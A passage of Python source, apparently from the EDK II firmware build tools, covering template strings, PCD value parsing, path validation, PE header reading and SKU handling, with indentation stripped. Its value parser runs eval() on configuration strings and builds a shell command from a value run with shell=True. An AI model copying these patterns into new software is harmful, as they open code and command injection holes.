"TemplateString",
PARAMETER_INVALID,
"${%s} has different repeat time from others!" % PlaceHolder,
ExtraData=str(self._Template)
)
RepeatPlaceHolders["${%s}" % PlaceHolder] = Value
else:
NonRepeatPlaceHolders["${%s}" % PlaceHolder] = Value
if NonRepeatPlaceHolders:
StringList = []
for S in self._SubSectionList:
if S not in NonRepeatPlaceHolders:
StringList.append(S)
else:
StringList.append(str(NonRepeatPlaceHolders[S]))
else:
StringList = self._SubSectionList
if RepeatPlaceHolders:
TempStringList = []
for Index in range(RepeatTime):
for S in StringList:
if S not in RepeatPlaceHolders:
TempStringList.append(S)
else:
TempStringList.append(str(RepeatPlaceHolders[S][Index]))
StringList = TempStringList
return "".join(StringList)
## Constructor
def __init__(self, Template=None):
self.String = []
self.IsBinary = False
self._Template = Template
self._TemplateSectionList = self._Parse(Template)
## str() operator
#
# @retval string The string replaced
#
def __str__(self):
return "".join(self.String)
## Split the template string into fragments per the ${BEGIN} and ${END} flags
#
# @retval list A list of TemplateString.Section objects
#
def _Parse(self, Template):
SectionStart = 0
SearchFrom = 0
MatchEnd = 0
PlaceHolderList = []
TemplateSectionList = []
while Template:
MatchObj = gPlaceholderPattern.search(Template, SearchFrom)
if not MatchObj:
if MatchEnd <= len(Template):
TemplateSection = TemplateString.Section(Template[SectionStart:], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
break
MatchString = MatchObj.group(1)
MatchStart = MatchObj.start()
MatchEnd = MatchObj.end()
if MatchString == self._REPEAT_START_FLAG:
if MatchStart > SectionStart:
TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
SectionStart = MatchEnd
PlaceHolderList = []
elif MatchString == self._REPEAT_END_FLAG:
TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
SectionStart = MatchEnd
PlaceHolderList = []
else:
PlaceHolderList.append((MatchString, MatchStart - SectionStart, MatchEnd - SectionStart))
SearchFrom = MatchEnd
return TemplateSectionList
## Replace the string template with dictionary of placeholders and append it to previous one
#
# @param AppendString The string template to append
# @param Dictionary The placeholder dictionaries
#
def Append(self, AppendString, Dictionary=None):
if Dictionary:
SectionList = self._Parse(AppendString)
self.String.append( "".join(S.Instantiate(Dictionary) for S in SectionList))
else:
if isinstance(AppendString,list):
self.String.extend(AppendString)
else:
self.String.append(AppendString)
## Replace the string template with dictionary of placeholders
#
# @param Dictionary The placeholder dictionaries
#
# @retval str The string replaced with placeholder values
#
def Replace(self, Dictionary=None):
return "".join(S.Instantiate(Dictionary) for S in self._TemplateSectionList)
## Progress indicator class
#
# This class makes use of thread to print progress on console.
#
class Progressor:
# for avoiding deadloop
_StopFlag = None
_ProgressThread = None
_CheckInterval = 0.25
## Constructor
#
# @param OpenMessage The string printed before progress characters
# @param CloseMessage The string printed after progress characters
# @param ProgressChar The character used to indicate the progress
# @param Interval The interval in seconds between two progress characters
#
def __init__(self, OpenMessage="", CloseMessage="", ProgressChar='.', Interval=1.0):
self.PromptMessage = OpenMessage
self.CodaMessage = CloseMessage
self.ProgressChar = ProgressChar
self.Interval = Interval
if Progressor._StopFlag is None:
Progressor._StopFlag = threading.Event()
## Start to print progress character
#
# @param OpenMessage The string printed before progress characters
#
def Start(self, OpenMessage=None):
if OpenMessage is not None:
self.PromptMessage = OpenMessage
Progressor._StopFlag.clear()
if Progressor._ProgressThread is None:
Progressor._ProgressThread = threading.Thread(target=self._ProgressThreadEntry)
Progressor._ProgressThread.setDaemon(False)
Progressor._ProgressThread.start()
## Stop printing progress character
#
# @param CloseMessage The string printed after progress characters
#
def Stop(self, CloseMessage=None):
OriginalCodaMessage = self.CodaMessage
if CloseMessage is not None:
self.CodaMessage = CloseMessage
self.Abort()
self.CodaMessage = OriginalCodaMessage
## Thread entry method
def _ProgressThreadEntry(self):
sys.stdout.write(self.PromptMessage + " ")
sys.stdout.flush()
TimeUp = 0.0
while not Progressor._StopFlag.isSet():
if TimeUp <= 0.0:
sys.stdout.write(self.ProgressChar)
sys.stdout.flush()
TimeUp = self.Interval
time.sleep(self._CheckInterval)
TimeUp -= self._CheckInterval
sys.stdout.write(" " + self.CodaMessage + "\n")
sys.stdout.flush()
## Abort the progress display
@staticmethod
def Abort():
if Progressor._StopFlag is not None:
Progressor._StopFlag.set()
if Progressor._ProgressThread is not None:
Progressor._ProgressThread.join()
Progressor._ProgressThread = None
## Dictionary using prioritized list as key
#
class tdict:
_ListType = type([])
_TupleType = type(())
_Wildcard = 'COMMON'
_ValidWildcardList = ['COMMON', 'DEFAULT', 'ALL', TAB_STAR, 'PLATFORM']
def __init__(self, _Single_=False, _Level_=2):
self._Level_ = _Level_
self.data = {}
self._Single_ = _Single_
# =[] operator
def __getitem__(self, key):
KeyType = type(key)
RestKeys = None
if KeyType == self._ListType or KeyType == self._TupleType:
FirstKey = key[0]
if len(key) > 1:
RestKeys = key[1:]
elif self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
else:
FirstKey = key
if self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
if FirstKey is None or str(FirstKey).upper() in self._ValidWildcardList:
FirstKey = self._Wildcard
if self._Single_:
return self._GetSingleValue(FirstKey, RestKeys)
else:
return self._GetAllValues(FirstKey, RestKeys)
def _GetSingleValue(self, FirstKey, RestKeys):
Value = None
#print "%s-%s" % (FirstKey, self._Level_) ,
if self._Level_ > 1:
if FirstKey == self._Wildcard:
if FirstKey in self.data:
Value = self.data[FirstKey][RestKeys]
if Value is None:
for Key in self.data:
Value = self.data[Key][RestKeys]
if Value is not None: break
else:
if FirstKey in self.data:
Value = self.data[FirstKey][RestKeys]
if Value is None and self._Wildcard in self.data:
#print "Value=None"
Value = self.data[self._Wildcard][RestKeys]
else:
if FirstKey == self._Wildcard:
if FirstKey in self.data:
Value = self.data[FirstKey]
if Value is None:
for Key in self.data:
Value = self.data[Key]
if Value is not None: break
else:
if FirstKey in self.data:
Value = self.data[FirstKey]
elif self._Wildcard in self.data:
Value = self.data[self._Wildcard]
return Value
def _GetAllValues(self, FirstKey, RestKeys):
Value = []
if self._Level_ > 1:
if FirstKey == self._Wildcard:
for Key in self.data:
Value += self.data[Key][RestKeys]
else:
if FirstKey in self.data:
Value += self.data[FirstKey][RestKeys]
if self._Wildcard in self.data:
Value += self.data[self._Wildcard][RestKeys]
else:
if FirstKey == self._Wildcard:
for Key in self.data:
Value.append(self.data[Key])
else:
if FirstKey in self.data:
Value.append(self.data[FirstKey])
if self._Wildcard in self.data:
Value.append(self.data[self._Wildcard])
return Value
## []= operator
def __setitem__(self, key, value):
KeyType = type(key)
RestKeys = None
if KeyType == self._ListType or KeyType == self._TupleType:
FirstKey = key[0]
if len(key) > 1:
RestKeys = key[1:]
else:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
else:
FirstKey = key
if self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
if FirstKey in self._ValidWildcardList:
FirstKey = self._Wildcard
if FirstKey not in self.data and self._Level_ > 0:
self.data[FirstKey] = tdict(self._Single_, self._Level_ - 1)
if self._Level_ > 1:
self.data[FirstKey][RestKeys] = value
else:
self.data[FirstKey] = value
def SetGreedyMode(self):
self._Single_ = False
if self._Level_ > 1:
for Key in self.data:
self.data[Key].SetGreedyMode()
def SetSingleMode(self):
self._Single_ = True
if self._Level_ > 1:
for Key in self.data:
self.data[Key].SetSingleMode()
def GetKeys(self, KeyIndex=0):
assert KeyIndex >= 0
if KeyIndex == 0:
return set(self.data.keys())
else:
keys = set()
for Key in self.data:
keys |= self.data[Key].GetKeys(KeyIndex - 1)
return keys
def AnalyzePcdExpression(Setting):
RanStr = ''.join(sample(string.ascii_letters + string.digits, 8))
Setting = Setting.replace('\\\\', RanStr).strip()
# There might be escaped quote in a string: \", \\\" , \', \\\'
Data = Setting
# There might be '|' in string and in ( ... | ... ), replace it with '-'
NewStr = ''
InSingleQuoteStr = False
InDoubleQuoteStr = False
Pair = 0
for Index, ch in enumerate(Data):
if ch == '"' and not InSingleQuoteStr:
if Data[Index - 1] != '\\':
InDoubleQuoteStr = not InDoubleQuoteStr
elif ch == "'" and not InDoubleQuoteStr:
if Data[Index - 1] != '\\':
InSingleQuoteStr = not InSingleQuoteStr
elif ch == '(' and not (InSingleQuoteStr or InDoubleQuoteStr):
Pair += 1
elif ch == ')' and not (InSingleQuoteStr or InDoubleQuoteStr):
Pair -= 1
if (Pair > 0 or InSingleQuoteStr or InDoubleQuoteStr) and ch == TAB_VALUE_SPLIT:
NewStr += '-'
else:
NewStr += ch
FieldList = []
StartPos = 0
while True:
Pos = NewStr.find(TAB_VALUE_SPLIT, StartPos)
if Pos < 0:
FieldList.append(Setting[StartPos:].strip())
break
FieldList.append(Setting[StartPos:Pos].strip())
StartPos = Pos + 1
for i, ch in enumerate(FieldList):
if RanStr in ch:
FieldList[i] = ch.replace(RanStr,'\\\\')
return FieldList
def ParseFieldValue (Value):
def ParseDevPathValue (Value):
if '\\' in Value:
Value.replace('\\', '/').replace(' ', '')
Cmd = 'DevicePath ' + '"' + Value + '"'
try:
p = subprocess.Popen(Cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
out, err = p.communicate()
except Exception as X:
raise BadExpression("DevicePath: %s" % (str(X)) )
finally:
subprocess._cleanup()
p.stdout.close()
p.stderr.close()
if err:
raise BadExpression("DevicePath: %s" % str(err))
out = out.decode()
Size = len(out.split())
out = ','.join(out.split())
return '{' + out + '}', Size
if "{CODE(" in Value:
return Value, len(Value.split(","))
if isinstance(Value, type(0)):
return Value, (Value.bit_length() + 7) // 8
if not isinstance(Value, type('')):
raise BadExpression('Type %s is %s' %(Value, type(Value)))
Value = Value.strip()
if Value.startswith(TAB_UINT8) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 1:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 1
if Value.startswith(TAB_UINT16) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 2:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 2
if Value.startswith(TAB_UINT32) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 4:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 4
if Value.startswith(TAB_UINT64) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 8:
raise BadExpression('Value (%s) Size larger than %d' % (Value, Size))
return Value, 8
if Value.startswith(TAB_GUID) and Value.endswith(')'):
Value = Value.split('(', 1)[1][:-1].strip()
if Value[0] == '{' and Value[-1] == '}':
TmpValue = GuidStructureStringToGuidString(Value)
if not TmpValue:
raise BadExpression("Invalid GUID value string %s" % Value)
Value = TmpValue
if Value[0] == '"' and Value[-1] == '"':
Value = Value[1:-1]
try:
Value = str(uuid.UUID(Value).bytes_le)
if Value.startswith("b'"):
Value = Value[2:-1]
Value = "'" + Value + "'"
except ValueError as Message:
raise BadExpression(Message)
Value, Size = ParseFieldValue(Value)
return Value, 16
if Value.startswith('L"') and Value.endswith('"'):
# Unicode String
# translate escape character
Value = Value[1:]
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
List.reverse()
Value = 0
for Char in List:
Value = (Value << 16) | ord(Char)
return Value, (len(List) + 1) * 2
if Value.startswith('"') and Value.endswith('"'):
# ASCII String
# translate escape character
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
List.reverse()
Value = 0
for Char in List:
Value = (Value << 8) | ord(Char)
return Value, len(List) + 1
if Value.startswith("L'") and Value.endswith("'"):
# Unicode Character Constant
# translate escape character
Value = Value[1:]
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
if len(List) == 0:
raise BadExpression('Length %s is %s' % (Value, len(List)))
List.reverse()
Value = 0
for Char in List:
Value = (Value << 16) | ord(Char)
return Value, len(List) * 2
if Value.startswith("'") and Value.endswith("'"):
# Character constant
# translate escape character
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
if len(List) == 0:
raise BadExpression('Length %s is %s' % (Value, len(List)))
List.reverse()
Value = 0
for Char in List:
Value = (Value << 8) | ord(Char)
return Value, len(List)
if Value.startswith('{') and Value.endswith('}'):
# Byte array
Value = Value[1:-1]
List = [Item.strip() for Item in Value.split(',')]
List.reverse()
Value = 0
RetSize = 0
for Item in List:
ItemValue, Size = ParseFieldValue(Item)
RetSize += Size
for I in range(Size):
Value = (Value << 8) | ((ItemValue >> 8 * I) & 0xff)
return Value, RetSize
if Value.startswith('DEVICE_PATH(') and Value.endswith(')'):
Value = Value.replace("DEVICE_PATH(", '').rstrip(')')
Value = Value.strip().strip('"')
return ParseDevPathValue(Value)
if Value.lower().startswith('0x'):
try:
Value = int(Value, 16)
except:
raise BadExpression("invalid hex value: %s" % Value)
if Value == 0:
return 0, 1
return Value, (Value.bit_length() + 7) // 8
if Value[0].isdigit():
Value = int(Value, 10)
if Value == 0:
return 0, 1
return Value, (Value.bit_length() + 7) // 8
if Value.lower() == 'true':
return 1, 1
if Value.lower() == 'false':
return 0, 1
return Value, 1
## AnalyzeDscPcd
#
# Analyze DSC PCD value, since there is no data type info in DSC
# This function is used to match functions (AnalyzePcdData) used for retrieving PCD value from database
# 1. Feature flag: TokenSpace.PcdCName|PcdValue
# 2. Fix and Patch:TokenSpace.PcdCName|PcdValue[|VOID*[|MaxSize]]
# 3. Dynamic default:
# TokenSpace.PcdCName|PcdValue[|VOID*[|MaxSize]]
# TokenSpace.PcdCName|PcdValue
# 4. Dynamic VPD:
# TokenSpace.PcdCName|VpdOffset[|VpdValue]
# TokenSpace.PcdCName|VpdOffset[|MaxSize[|VpdValue]]
# 5. Dynamic HII:
# TokenSpace.PcdCName|HiiString|VariableGuid|VariableOffset[|HiiValue]
# PCD value needs to be located in such kind of string, and the PCD value might be an expression in which
# there might have "|" operator, also in string value.
#
# @param Setting: String contain information described above with "TokenSpace.PcdCName|" stripped
# @param PcdType: PCD type: feature, fixed, dynamic default VPD HII
# @param DataType: The datum type of PCD: VOID*, UNIT, BOOL
# @retval:
# ValueList: A List contain fields described above
# IsValid: True if conforming EBNF, otherwise False
# Index: The index where PcdValue is in ValueList
#
def AnalyzeDscPcd(Setting, PcdType, DataType=''):
FieldList = AnalyzePcdExpression(Setting)
IsValid = True
if PcdType in (MODEL_PCD_FIXED_AT_BUILD, MODEL_PCD_PATCHABLE_IN_MODULE, MODEL_PCD_DYNAMIC_DEFAULT, MODEL_PCD_DYNAMIC_EX_DEFAULT):
Value = FieldList[0]
Size = ''
if len(FieldList) > 1 and FieldList[1]:
DataType = FieldList[1]
if FieldList[1] != TAB_VOID and StructPattern.match(FieldList[1]) is None:
IsValid = False
if len(FieldList) > 2:
Size = FieldList[2]
if IsValid:
if DataType == "":
IsValid = (len(FieldList) <= 1)
else:
IsValid = (len(FieldList) <= 3)
if Size:
try:
int(Size, 16) if Size.upper().startswith("0X") else int(Size)
except:
IsValid = False
Size = -1
return [str(Value), DataType, str(Size)], IsValid, 0
elif PcdType == MODEL_PCD_FEATURE_FLAG:
Value = FieldList[0]
Size = ''
IsValid = (len(FieldList) <= 1)
return [Value, DataType, str(Size)], IsValid, 0
elif PcdType in (MODEL_PCD_DYNAMIC_VPD, MODEL_PCD_DYNAMIC_EX_VPD):
VpdOffset = FieldList[0]
Value = Size = ''
if not DataType == TAB_VOID:
if len(FieldList) > 1:
Value = FieldList[1]
else:
if len(FieldList) > 1:
Size = FieldList[1]
if len(FieldList) > 2:
Value = FieldList[2]
if DataType == "":
IsValid = (len(FieldList) <= 1)
else:
IsValid = (len(FieldList) <= 3)
if Size:
try:
int(Size, 16) if Size.upper().startswith("0X") else int(Size)
except:
IsValid = False
Size = -1
return [VpdOffset, str(Size), Value], IsValid, 2
elif PcdType in (MODEL_PCD_DYNAMIC_HII, MODEL_PCD_DYNAMIC_EX_HII):
IsValid = (3 <= len(FieldList) <= 5)
HiiString = FieldList[0]
Guid = Offset = Value = Attribute = ''
if len(FieldList) > 1:
Guid = FieldList[1]
if len(FieldList) > 2:
Offset = FieldList[2]
if len(FieldList) > 3:
Value = FieldList[3]
if len(FieldList) > 4:
Attribute = FieldList[4]
return [HiiString, Guid, Offset, Value, Attribute], IsValid, 3
return [], False, 0
## AnalyzePcdData
#
# Analyze the pcd Value, Datum type and TokenNumber.
# Used to avoid split issue while the value string contain "|" character
#
# @param[in] Setting: A String contain value/datum type/token number information;
#
# @retval ValueList: A List contain value, datum type and toke number.
#
def AnalyzePcdData(Setting):
ValueList = ['', '', '']
ValueRe = re.compile(r'^\s*L?\".*\|.*\"')
PtrValue = ValueRe.findall(Setting)
ValueUpdateFlag = False
if len(PtrValue) >= 1:
Setting = re.sub(ValueRe, '', Setting)
ValueUpdateFlag = True
TokenList = Setting.split(TAB_VALUE_SPLIT)
ValueList[0:len(TokenList)] = TokenList
if ValueUpdateFlag:
ValueList[0] = PtrValue[0]
return ValueList
## check format of PCD value against its the datum type
#
# For PCD value setting
#
def CheckPcdDatum(Type, Value):
if Type == TAB_VOID:
ValueRe = re.compile(r'\s*L?\".*\"\s*$')
if not (((Value.startswith('L"') or Value.startswith('"')) and Value.endswith('"'))
or (Value.startswith('{') and Value.endswith('}')) or (Value.startswith("L'") or Value.startswith("'") and Value.endswith("'"))
):
return False, "Invalid value [%s] of type [%s]; must be in the form of {...} for array"\
", \"...\" or \'...\' for string, L\"...\" or L\'...\' for unicode string" % (Value, Type)
elif ValueRe.match(Value):
# Check the chars in UnicodeString or CString is printable
if Value.startswith("L"):
Value = Value[2:-1]
else:
Value = Value[1:-1]
Printset = set(string.printable)
Printset.remove(TAB_PRINTCHAR_VT)
Printset.add(TAB_PRINTCHAR_BS)
Printset.add(TAB_PRINTCHAR_NUL)
if not set(Value).issubset(Printset):
PrintList = sorted(Printset)
return False, "Invalid PCD string value of type [%s]; must be printable chars %s." % (Type, PrintList)
elif Type == 'BOOLEAN':
if Value not in ['TRUE', 'True', 'true', '0x1', '0x01', '1', 'FALSE', 'False', 'false', '0x0', '0x00', '0']:
return False, "Invalid value [%s] of type [%s]; must be one of TRUE, True, true, 0x1, 0x01, 1"\
", FALSE, False, false, 0x0, 0x00, 0" % (Value, Type)
elif Type in [TAB_UINT8, TAB_UINT16, TAB_UINT32, TAB_UINT64]:
if Value.startswith('0') and not Value.lower().startswith('0x') and len(Value) > 1 and Value.lstrip('0'):
Value = Value.lstrip('0')
try:
if Value and int(Value, 0) < 0:
return False, "PCD can't be set to negative value[%s] for datum type [%s]" % (Value, Type)
Value = int(Value, 0)
if Value > MAX_VAL_TYPE[Type]:
return False, "Too large PCD value[%s] for datum type [%s]" % (Value, Type)
except:
return False, "Invalid value [%s] of type [%s];"\
" must be a hexadecimal, decimal or octal in C language format." % (Value, Type)
else:
return True, "StructurePcd"
return True, ""
def CommonPath(PathList):
P1 = min(PathList).split(os.path.sep)
P2 = max(PathList).split(os.path.sep)
for Index in range(min(len(P1), len(P2))):
if P1[Index] != P2[Index]:
return os.path.sep.join(P1[:Index])
return os.path.sep.join(P1)
class PathClass(object):
def __init__(self, File='', Root='', AlterRoot='', Type='', IsBinary=False,
Arch='COMMON', ToolChainFamily='', Target='', TagName='', ToolCode=''):
self.Arch = Arch
self.File = str(File)
if os.path.isabs(self.File):
self.Root = ''
self.AlterRoot = ''
else:
self.Root = str(Root)
self.AlterRoot = str(AlterRoot)
# Remove any '.' and '..' in path
if self.Root:
self.Root = mws.getWs(self.Root, self.File)
self.Path = os.path.normpath(os.path.join(self.Root, self.File))
self.Root = os.path.normpath(CommonPath([self.Root, self.Path]))
# eliminate the side-effect of 'C:'
if self.Root[-1] == ':':
self.Root += os.path.sep
# file path should not start with path separator
if self.Root[-1] == os.path.sep:
self.File = self.Path[len(self.Root):]
else:
self.File = self.Path[len(self.Root) + 1:]
else:
self.Path = os.path.normpath(self.File)
self.SubDir, self.Name = os.path.split(self.File)
self.BaseName, self.Ext = os.path.splitext(self.Name)
if self.Root:
if self.SubDir:
self.Dir = os.path.join(self.Root, self.SubDir)
else:
self.Dir = self.Root
else:
self.Dir = self.SubDir
if IsBinary:
self.Type = Type
else:
self.Type = self.Ext.lower()
self.IsBinary = IsBinary
self.Target = Target
self.TagName = TagName
self.ToolCode = ToolCode
self.ToolChainFamily = ToolChainFamily
self.OriginalPath = self
## Convert the object of this class to a string
#
# Convert member Path of the class to a string
#
# @retval string Formatted String
#
def __str__(self):
return self.Path
## Override __eq__ function
#
# Check whether PathClass are the same
#
# @retval False The two PathClass are different
# @retval True The two PathClass are the same
#
def __eq__(self, Other):
return self.Path == str(Other)
## Override __cmp__ function
#
# Customize the comparison operation of two PathClass
#
# @retval 0 The two PathClass are different
# @retval -1 The first PathClass is less than the second PathClass
# @retval 1 The first PathClass is Bigger than the second PathClass
def __cmp__(self, Other):
OtherKey = str(Other)
SelfKey = self.Path
if SelfKey == OtherKey:
return 0
elif SelfKey > OtherKey:
return 1
else:
return -1
## Override __hash__ function
#
# Use Path as key in hash table
#
# @retval string Key for hash table
#
def __hash__(self):
return hash(self.Path)
@cached_property
def Key(self):
return self.Path.upper()
@property
def TimeStamp(self):
return os.stat(self.Path)[8]
def Validate(self, Type='', CaseSensitive=True):
def RealPath2(File, Dir='', OverrideDir=''):
NewFile = None
if OverrideDir:
NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
if NewFile:
if OverrideDir[-1] == os.path.sep:
return NewFile[len(OverrideDir):], NewFile[0:len(OverrideDir)]
else:
return NewFile[len(OverrideDir) + 1:], NewFile[0:len(OverrideDir)]
if GlobalData.gAllFiles:
NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(Dir, File))]
if not NewFile:
NewFile = os.path.normpath(os.path.join(Dir, File))
if not os.path.exists(NewFile):
return None, None
if NewFile:
if Dir:
if Dir[-1] == os.path.sep:
return NewFile[len(Dir):], NewFile[0:len(Dir)]
else:
return NewFile[len(Dir) + 1:], NewFile[0:len(Dir)]
else:
return NewFile, ''
return None, None
if GlobalData.gCaseInsensitive:
CaseSensitive = False
if Type and Type.lower() != self.Type:
return FILE_TYPE_MISMATCH, '%s (expect %s but got %s)' % (self.File, Type, self.Type)
RealFile, RealRoot = RealPath2(self.File, self.Root, self.AlterRoot)
if not RealRoot and not RealFile:
RealFile = self.File
if self.AlterRoot:
RealFile = os.path.join(self.AlterRoot, self.File)
elif self.Root:
RealFile = os.path.join(self.Root, self.File)
if len (mws.getPkgPath()) == 0:
return FILE_NOT_FOUND, os.path.join(self.AlterRoot, RealFile)
else:
return FILE_NOT_FOUND, "%s is not found in packages path:\n\t%s" % (self.File, '\n\t'.join(mws.getPkgPath()))
ErrorCode = 0
ErrorInfo = ''
if RealRoot != self.Root or RealFile != self.File:
if CaseSensitive and (RealFile != self.File or (RealRoot != self.Root and RealRoot != self.AlterRoot)):
ErrorCode = FILE_CASE_MISMATCH
ErrorInfo = self.File + '\n\t' + RealFile + " [in file system]"
self.SubDir, self.Name = os.path.split(RealFile)
self.BaseName, self.Ext = os.path.splitext(self.Name)
if self.SubDir:
self.Dir = os.path.join(RealRoot, self.SubDir)
else:
self.Dir = RealRoot
self.File = RealFile
self.Root = RealRoot
self.Path = os.path.join(RealRoot, RealFile)
return ErrorCode, ErrorInfo
## Parse PE image to get the required PE information.
#
class PeImageClass():
## Constructor
#
# @param File FilePath of PeImage
#
def __init__(self, PeFile):
self.FileName = PeFile
self.IsValid = False
self.Size = 0
self.EntryPoint = 0
self.SectionAlignment = 0
self.SectionHeaderList = []
self.ErrorInfo = ''
try:
PeObject = open(PeFile, 'rb')
except:
self.ErrorInfo = self.FileName + ' can not be found\n'
return
# Read DOS header
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x3E)
ByteList = ByteArray.tolist()
# DOS signature should be 'MZ'
if self._ByteListToStr (ByteList[0x0:0x2]) != 'MZ':
self.ErrorInfo = self.FileName + ' has no valid DOS signature MZ'
return
# Read 4 byte PE Signature
PeOffset = self._ByteListToInt(ByteList[0x3C:0x3E])
PeObject.seek(PeOffset)
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 4)
# PE signature should be 'PE\0\0'
if ByteArray.tostring() != b'PE\0\0':
self.ErrorInfo = self.FileName + ' has no valid PE signature PE00'
return
# Read PE file header
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x14)
ByteList = ByteArray.tolist()
SecNumber = self._ByteListToInt(ByteList[0x2:0x4])
if SecNumber == 0:
self.ErrorInfo = self.FileName + ' has no section header'
return
# Read PE optional header
OptionalHeaderSize = self._ByteListToInt(ByteArray[0x10:0x12])
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, OptionalHeaderSize)
ByteList = ByteArray.tolist()
self.EntryPoint = self._ByteListToInt(ByteList[0x10:0x14])
self.SectionAlignment = self._ByteListToInt(ByteList[0x20:0x24])
self.Size = self._ByteListToInt(ByteList[0x38:0x3C])
# Read each Section Header
for Index in range(SecNumber):
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x28)
ByteList = ByteArray.tolist()
SecName = self._ByteListToStr(ByteList[0:8])
SecVirtualSize = self._ByteListToInt(ByteList[8:12])
SecRawAddress = self._ByteListToInt(ByteList[20:24])
SecVirtualAddress = self._ByteListToInt(ByteList[12:16])
self.SectionHeaderList.append((SecName, SecVirtualAddress, SecRawAddress, SecVirtualSize))
self.IsValid = True
PeObject.close()
def _ByteListToStr(self, ByteList):
String = ''
for index in range(len(ByteList)):
if ByteList[index] == 0:
break
String += chr(ByteList[index])
return String
def _ByteListToInt(self, ByteList):
Value = 0
for index in range(len(ByteList) - 1, -1, -1):
Value = (Value << 8) | int(ByteList[index])
return Value
class DefaultStore():
def __init__(self, DefaultStores ):
self.DefaultStores = DefaultStores
def DefaultStoreID(self, DefaultStoreName):
for key, value in self.DefaultStores.items():
if value == DefaultStoreName:
return key
return None
def GetDefaultDefault(self):
if not self.DefaultStores or "0" in self.DefaultStores:
return "0", TAB_DEFAULT_STORES_DEFAULT
else:
minvalue = min(int(value_str) for value_str in self.DefaultStores)
return (str(minvalue), self.DefaultStores[str(minvalue)])
def GetMin(self, DefaultSIdList):
if not DefaultSIdList:
return TAB_DEFAULT_STORES_DEFAULT
storeidset = {storeid for storeid, storename in self.DefaultStores.values() if storename in DefaultSIdList}
if not storeidset:
return ""
minid = min(storeidset )
for sid, name in self.DefaultStores.values():
if sid == minid:
return name
class SkuClass():
DEFAULT = 0
SINGLE = 1
MULTIPLE =2
def __init__(self,SkuIdentifier='', SkuIds=None):
if SkuIds is None:
SkuIds = {}
for SkuName in SkuIds:
SkuId = SkuIds[SkuName][0]
skuid_num = int(SkuId, 16) if SkuId.upper().startswith("0X") else int(SkuId)
if skuid_num > 0xFFFFFFFFFFFFFFFF:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData = "SKU-ID [%s] value %s exceeds the max value of UINT64"
% (SkuName, SkuId))
self.AvailableSkuIds = OrderedDict()
self.SkuIdSet = []
self.SkuIdNumberSet = []
self.SkuData = SkuIds
self._SkuInherit = {}
self._SkuIdentifier = SkuIdentifier
if SkuIdentifier == '' or SkuIdentifier is None:
self.SkuIdSet = ['DEFAULT']
self.SkuIdNumberSet = ['0U']
elif SkuIdentifier == 'ALL':
self.SkuIdSet = list(SkuIds.keys())
self.SkuIdNumberSet = [num[0].strip() + 'U' for num in SkuIds.values()]
else:
r = SkuIdentifier.split('|')
self.SkuIdSet=[(r[k].strip()).upper() for k in range(len(r))]
k = None
try:
self.SkuIdNumberSet = [SkuIds[k][0].strip() + 'U' for k in self.SkuIdSet]
except Exception:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData = "SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
% (k, " | ".join(SkuIds.keys())))
for each in self.SkuIdSet:
if each in SkuIds:
self.AvailableSkuIds[each] = SkuIds[each][0]
else:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData="SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
% (each, " | ".join(SkuIds.keys())))
if self.SkuUsageType != SkuClass.SINGLE:
self.AvailableSkuIds.update({'DEFAULT':0, 'COMMON':0})
if self.SkuIdSet:
GlobalData.gSkuids = (self.SkuIdSet)
if 'COMMON' in GlobalData.gSkuids:
GlobalData.gSkuids.remove('COMMON')
if self.SkuUsageType == self.SINGLE:
if len(GlobalData.gSkuids) != 1:
if 'DEFAULT' in GlobalData.gSkuids:
GlobalData.gSkuids.remove('DEFAULT')
if GlobalData.gSkuids:
GlobalData.gSkuids.sort()
def GetNextSkuId(self, skuname):
if not self._SkuInherit:
self._SkuInherit = {}
for item in self.SkuData.values():
self._SkuInherit[item[1]]=item[2] if item[2] else "DEFAULT"
return self._SkuInherit.get(skuname, "DEFAULT")
def GetSkuChain(self, sku):
if sku == "DEFAULT":
return ["DEFAULT"]
skulist = [sku]
nextsku = sku
while True:
nextsku = self.GetNextSkuId(nextsku)
skulist.append(nextsku)
if nextsku == "DEFAULT":
break
skulist.reverse()
return skulist
def SkuOverrideOrder(self):
skuorderset = []
for skuname in self.SkuIdSet:
skuorderset.append(self.GetSkuChain(skuname))
skuorder = []
for index in range(max(len(item) for item in skuorderset)):
for subset in skuorderset:
if index > len(subset)-1:
continue
if subset[index] in skuorder:
continue
skuorder.append(subset[index])
return skuorder
@property
def SkuUsageType(self):
if self._SkuIdentifier.upper() == "ALL":
return SkuClass.MULTIPLE
if len(self.SkuIdSet) == 1:
